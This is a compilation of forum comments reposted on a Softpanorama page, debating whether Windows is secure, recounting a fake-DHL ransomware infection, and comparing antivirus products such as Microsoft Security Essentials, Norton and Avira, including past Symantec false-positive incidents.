    I'm by no means anti-MS (Windows 7 is the only OS on both of my home PCs these days), but I'd take issue with the blanket statement that "Windows is also secure nowadays".

    I went through endless fun thanks to the parents just before Christmas. They fell for one of those fake-DHL-shipping-notice spam e-mails (as they were actually expecting a Christmas-related DHL delivery) and, with a single click, landed their (3 month old, Norton-"protected", UAC-enabled) PC with one of the most vicious and persistent pieces of malware I've ever seen. One of those fake-AV-software ransomware jobbies. It disabled Norton, blocked Windows from accessing DVD and USB drives, did a dns redirect so that browsers could only access the ransomware page and all kinds of crap. I've sorted these before by doing a system restore from a backup point in safe-mode, but even though the restore allegedly worked in this case, the malware persisted through it quite happily. Ended up doing a full format and reinstall of Windows.

    Now, there are a lot of failures in this story; my parents for clicking the link, Norton for being completely (and predictably) useless and so on. But I still have problems with describing an OS where a single click can land you in that kind of mess as "secure".

    Personally, I use AVG, on the grounds that it provides some basic protection and makes my system chug less than most of its rivals. But it's by no means infallible, throws up a depressing number of false positives and the only way to avoid infection does appear to be abject paranoia (which is now my default policy).

    tnk1 (899206)

    Why would MS work to put AV companies out of business? The reason for MSE is plain: they're embarrassed about the (deserved) reputation of their past OSes in terms of security and needed to address it. These bloated AV programs like Symantec's suite were also bogging down the systems of people who use Windows, which makes Windows seem slow as well. In the end, it was a smart move to get in there and provide an AV that was both useful and mostly unobtrusive. This isn't the browser wars where MS was working to elbow out Netscape in a new area of software; AV companies have had years to make money and get it right and have instead written an expensive, and bloated product in almost all cases.

    Charliemopps (1157495)

    Yes, I'm ashamed to say MSE works really well. I'd argue it's because Microsoft has access to their own source-code and knows where they screwed up... but whatever... it's the best AV I've used, and I've used them all.

    TheLink (130905)
    I'd argue it's because Microsoft has access to their own source-code

    I doubt that's the real reason, because both Norton and McAfee used to be good. Then they started to be bigger resource hogs than most viruses they were protecting you against (yes there's other evil stuff that viruses do but keep reading...).

    I definitely recall Norton/Symantec making systems more unstable or causing problems:

    1) Years ago someone had problems fetching email, turns out Norton/Symantec was intercepting the POP3 connections to scan for viruses (ok fine), but some email was causing it to _crash_ (extremely not fine - especially if it turns out to be an exploitable code-injection bug).

    2) In 2007:

    A virus-signature update delivered automatically to users on Friday about 1:00 a.m. Beijing time to Symantec's antivirus scanning engine mistook two critical system files of the Simplified Chinese edition of Windows XP Service Pack 2 for a Trojan horse. The two files -- netapi32.dll and lsasrv.dll -- were falsely quarantined, which in turn crippled Windows. If an affected PC was rebooted, Windows failed on start-up and showed only a blue screen.

    3) On 28 January 2010, Symantec's antivirus software marked Spotify as a Trojan horse, disabling the software across millions of computers.

    Nowadays depending on the situation I use Avira, MSE or "no antivirus". My personal home machine has no AV installed. My browser runs as a different user process. If I have something that I think is suspicious, I check it with VirusTotal. So far I have had no problems doing things this way, so I don't see the point of constantly incurring the extra CPU/resource costs by installing a real-time virus scanner on my machine. For the past few decades my personal machines have never been infected by a virus. I may have downloaded viruses or malware, but I have not been infected by them. And yes I do know how to check.

    A dedicated attacker might be able to put malware on my machine, but they'd know how to use virustotal or similar too, and still be able to plant malware on my machine even if I was running AV software (and wasting resources).

    The machine my parents use on the other hand has AV software installed (not Symantec, nor McAfee).

    AV software is not needed everywhere and in some cases if installed, it indicates someone is doing something wrong.

    Given my track record vs Symantec's track record, I would prefer to take the bet that Symantec is more likely to screw up my system than a virus. There have been other antivirus vendors with similar screw ups too.

    On a related note, Trend screwed up notoriously - albeit with its antispam product, blocking the letter "p".

    For these reasons production servers and other important machines that are well secured and managed should NOT have antivirus software installed.

    If they are so poorly managed that the operators are much more likely to screw up than the AV vendors, then sure, install AV, but that means you are doing something wrong.

    Copyright © 1996-2020 by Softpanorama Society. was initially created as a service to the (now defunct) UN Sustainable Development Networking Programme (SDNP) in the author's free time and without any remuneration. This document is an industrial compilation designed and created exclusively for educational use and is distributed under the Softpanorama Content License. Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.

    Last modified: March, 12, 2019